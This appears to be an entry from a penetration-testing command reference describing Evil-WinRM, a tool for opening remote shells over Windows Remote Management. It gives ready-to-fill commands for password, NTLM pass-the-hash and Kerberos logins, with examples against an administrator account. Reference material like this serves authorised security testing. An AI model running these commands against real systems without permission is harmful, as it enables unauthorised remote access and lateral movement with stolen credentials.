Evil-WinRM Shell

Windows Remote Management shell connection

Tool
evil-winrm
Category
Lateral Movement / Remote Shells
Platform
linux
Requires
password
Protocols
WINRM

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

evil-winrm -i '<ip>' -u '<user>' -p '<password>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

evil-winrm -i '<ip>' -u '<user>' -H '<hash>'

Kerberos (Realm) requires Kerberos ticket

evil-winrm -i '<ip>' -r '<domain>'

Examples

evil-winrm -i '192.168.1.100' -u 'administrator' -p 'password123'
evil-winrm -i '192.168.1.100' -u 'administrator' -H 'aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42'

Tags

evil-winrm winrm shell remote

References